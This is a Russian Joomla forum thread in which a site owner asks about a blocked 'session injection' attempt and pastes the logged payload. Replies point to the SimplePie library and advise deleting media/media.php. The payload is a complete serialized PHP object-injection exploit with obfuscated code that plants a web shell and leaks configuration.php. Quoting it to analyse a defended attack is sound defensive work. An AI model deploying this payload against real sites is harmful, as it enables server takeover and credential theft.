Форум русской поддержки Joomla!® CMS
11.12.2016, 06:20:04 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Заблокирована попытка инжекции сессии. И таких попыток было 20 за месяц с разных IP

 (Прочитано 131 раз)
0 Пользователей и 1 Гость смотрят эту тему.
1-F7
Давно я тут
****

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 219



« : 06.10.2016, 10:08:35 »

Объясните пожалуйста, как это мне на сайт пытаются залить сессию? Через что. Код отчета вот такой:

Код:
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:3351:"eval(chr(112).chr(114).chr(105).chr(110).chr(116).chr(32).chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101).chr(40).chr(39).chr(97).chr(110).chr(86).chr(122).chr(90).chr(71).chr(112).chr(104).chr(99).chr(51).chr(86).chr(122).chr(89).chr(87).chr(112).chr(122).chr(89).chr(88).chr(86).chr(122).chr(89).chr(88).chr(85).chr(61).chr(39).chr(41).chr(59).chr(102).chr(105).chr(108).chr(101).chr(95).chr(112).chr(117).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115).chr(40).chr(115).chr(116).chr(114).chr(95).chr(114).chr(101).chr(112).chr(108).chr(97).chr(99).chr(101).chr(40).chr(39).chr(105).chr(110).chr(100).chr(101).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(39).chr(44).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(83).chr(67).chr(82).chr(73).chr(80).chr(84).chr(95).chr(70).chr(73).chr(76).chr(69).chr(78).chr(65).chr(77).chr(69).chr(39).chr(93).chr(41).chr(46).chr(39).chr(109).chr(101).chr(100).chr(105).chr(97).chr(47).chr(109).chr(101).chr(100).chr(105).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(32).chr(44).chr(32).chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101).chr(40).chr(39).chr(80).chr(68).chr(56).chr(103).chr(97).chr(87).chr(89).chr(111).chr(97).chr(88).chr(78).chr(122).chr(90).chr(88).chr(81).chr(111).chr(74).chr(70).chr(57).chr(72).chr(82).chr(86).chr(82).chr(98).chr(77).chr(86).chr(48).chr(112).chr(75).chr(88).chr(115).chr(107).chr(88).chr(122).chr(48).chr(107).chr(88).chr(48).chr(100).chr(70).chr(86).chr(68).chr(115).chr(107).chr(88).chr(49).chr(115).chr(120).chr(88).chr(83).chr(103).chr(107).chr(88).chr(49).chr(115).chr(121).chr(88).chr(83).chr(107).chr(55).chr(90).chr(88).chr(104).chr(112).chr(100).chr(68).chr(116).chr(57).chr(73).chr(68).chr(56).chr(43).chr(39).chr(41).chr(41).chr(59).chr(112).chr(114).chr(105).chr(110).chr(116).chr(32).chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(101).chr(110).chr(99).chr(111).chr(100).chr(101).chr(40).chr(102).chr(105).chr(108).chr(101).chr(95).chr(103).chr(101).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115).chr(40).chr(115).chr(116).chr(114).chr(95).chr(114).chr(101).chr(112).chr(108).chr(97).chr(99).chr(101).chr(40).chr(39).chr(105).chr(110).chr(100).chr(101).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(99).chr(111).chr(110).chr(102).chr(105).chr(103).chr(117).chr(114).chr(97).chr(116).chr(105).chr(111).chr(110).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(83).chr(67).chr(82).chr(73).chr(80).chr(84).chr(95).chr(70).chr(73).chr(76).chr(69).chr(78).chr(65).chr(77).chr(69).chr(39).chr(93).chr(41).chr(41).chr(41).chr(59).chr(112).chr(114).chr(105).chr(110).chr(116).chr(32).chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101).chr(40).chr(39).chr(97).chr(110).chr(86).chr(122).chr(90).chr(71).chr(112).chr(104).chr(99).chr(51).chr(86).chr(122).chr(89).chr(87).chr(112).chr(122).chr(89).chr(88).chr(86).chr(122).chr(89).chr(88).chr(85).chr(61).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}?, 77.87.110.131

Записан
1-F7
Давно я тут
****

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 219



« Ответ #1 : 06.10.2016, 10:27:07 »

RsFairwall говорит, что нужно выключить обработчик сессии базу данных и за частых взломов сайтов на Joomla через сесию.

Наверное уже все пользователи знают, что Joomla можно взломать через сессию администратора и пытаются атаковать сайт. Когда они уже успокоятся, дыры же уже закрыты.
Записан
robert
Профи
********

Репутация: +344/-11
Offline Offline

Пол: Мужской
Сообщений: 3595


« Ответ #2 : 06.10.2016, 11:20:06 »

Это вы пытались зашифровать configuration.php и вообще остальные файлы? Ну заодно зашифруете и файлы дырявого расширения(й), через которые вам пытались залить вредоносный код.
При поверхностном просмотре кода могу сказать, что это расширение использует библиотеку SimplePie - скорее всего оно связано с лентой новостей.
Найдите media/media.php и удалите его. Но это только устранение симптомов, а не болезни. Нужно найти дыру и закрыть ее.
Что значит "залить сессию"? IMHO, ваша компетентность в этом вопросе недостаточна, обращайтесь к специалистам.
Записан
flyingspook
Профи
********

Репутация: +226/-9
Offline Offline

Сообщений: 3540


« Ответ #3 : 06.10.2016, 19:34:13 »

@robert
не обращай внимание, ежегодно паранойя приходит ко многим и они начинают воздух сотрясать
Записан
Septdir
Живу я здесь
******

Репутация: +36/-3
Offline Offline

Пол: Мужской
Сообщений: 841


Skype: septdir


« Ответ #4 : 11.10.2016, 02:00:39 »

@robert
не обращай внимание, ежегодно паранойя приходит ко многим и они начинают воздух сотрясать
сейчас не весна....
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet